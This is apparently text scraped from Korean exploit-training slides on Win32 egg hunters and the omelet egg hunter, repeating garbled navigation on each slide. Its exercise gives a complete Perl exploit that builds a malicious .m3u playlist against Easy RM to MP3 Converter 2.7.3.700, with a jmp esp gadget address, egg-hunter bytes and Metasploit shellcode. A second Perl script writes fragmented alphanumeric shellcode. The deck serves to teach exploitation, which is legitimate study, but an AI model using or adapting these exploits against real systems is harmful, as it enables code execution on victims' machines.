  • 31. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ( Marker 삽입 검색대상주소(EDX)를 EDI에 저장 Marker(EAX) 와 검색대상주소(EDI) 비교
  • 32. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm) ) Marker 미 발견시 시작점(0x12cd6c)로 이동
  • 33. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Egg-Hunter using NtAccessCheck(AndAuditAlarm)  Marker 발견시 해당 지점으로 이동 Final Shellcode
  • 34. Exercise Time :D Target Info Win32 Easy RM to MP3 Converter v.2.7.3.700 Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 35. Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 36. Exercise Time :D Exploit Info .m3u Playlist File Format length of junk data is 26039 gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 37. Exercise Time :D Exploit Code (EggHuntingExploit.pl) my $file= "EggHuntingExploit.m3u"; my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $padding = "x90" x 25; my $egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8". "x77x30x30x74". # this is the marker/tag: w00t "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"; # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = $padding . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE,">$file"); print $FILE $junk.$eip.$padding.$egghunter."w00tw00t".$shellcode; close($FILE); print "m3u File Created successfullyn"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 38. What is the Omelet-Egg-Hunter ? 쉘코드 단편화 기술(shellcode fragmentation technique) Skylined(Berend-Jan Wever)에 의해 소개됨 (http://code.google.com/p/w32-seh-omelet-shellcode/) 공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제 어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용 기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재 최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그) 최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음) 일반적인 에그 헌터보다 크기가 더 크다(about 90bytes) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 39. Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 오리지널 쉘 코드 단편화 구성 Length of the Egg Index Number 3bytes Marker Fragmented ShellCode (1/n , 2/n, 3/n … n/n) Omelet-Egg-Hunter 코드 메모리 검색 (search through memory) 모든 에그 찾기(look for all egg) 단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack) 조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)
  • 40. Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행
  • 41. Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 !
  • 42. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 " Find Marker
  • 43. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 # Check length/index
  • 44. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 # reproduces the original shellcode at the bottom of the stack
  • 45. Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 $
  • 46. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 % Find Marker
  • 47. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 & Check length/index
  • 48. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 & reproduces the original shellcode at the bottom of the stack
  • 49. Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 '
  • 50. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ( Find Marker
  • 51. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ) Check length/index
  • 52. Track3. Exploitation How to work Omelet-Egg-Hunter ? Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ) reproduces the original shellcode at the bottom of the stack
  • 53. Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41  jumps to the reproduced shellcode and executes it
  • 54. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 55. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트) W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
  • 56. Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드 파일 생성 (makingShellCodeForOmelet.pl) my $scfile="shellcode.bin"; my $shellcode="x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49" . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47" . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c" . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a" . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50" . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43" . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a" . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c" . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44" . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c" . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47" . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50" . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44" . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43" . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42" . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b" . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45" . "x31x42x4cx42x43x45x50x41x41"; open(FILE,">$scfile"); print FILE $shellcode; close(FILE); print "Wrote ".length($shellcode)." bytes to file ".$scfile."n";
